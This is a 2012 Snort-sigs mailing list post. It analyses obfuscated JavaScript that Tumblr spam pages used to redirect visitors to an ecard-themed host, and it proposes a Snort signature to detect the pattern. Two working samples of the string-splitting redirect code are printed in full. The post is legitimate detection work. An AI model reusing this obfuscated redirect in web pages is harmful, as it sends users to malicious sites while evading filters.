Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Tumblr redirect update

From: James Lay <jlay () slave-tothe-box net>
Date: Fri, 06 Jul 2012 09:30:12 -0600
Team,

The bad guys have added an additional method for this from the previous 
version:
var yvkq='http'; var gql='://e'; function vfti(hzo,dpq){return hzo+dpq} 
var ojty=vfti(yvkq,gql);var ujh='card'; var rgl='5-l'; function 
izhm(nac,rww){return nac+rww} var imqv=izhm(ujh,rgl);var fyy='ove'; var 
qptv='r.c'; function rgjdww(zsb,uqi){return zsb+uqi} var 
eavjam=rgjdww(fyy,qptv);var uqv='om/?'; var cew='EUKM'; function 
wlwq(vzm,deb){return vzm+deb} var uelj=wlwq(uqv,cew);var cozw='lNO'; var 
gpp='R'; function zmkh(vkj,mov){return vkj+mov} var peqo=zmkh(cozw,gpp); 
var bzsd=ojty+imqv+eavjam+uelj+peqo; document.location = bzsd

and the new version:
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} 
var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function 
eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var 
xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} 
var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var 
zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var 
qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; 
document.location = otoa

The below Snort sig should match the previous method and the new one:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT 
Tumblr spam redirect"; flow:from_server; file_data; content:"='htt"; 
content:"://"; within: 15; metadata:policy security-ips drop, service 
http; classtype:bad-unknown; sid:XXXXXXX; reference: 
malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; rev:2;)

Thank you.

James

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: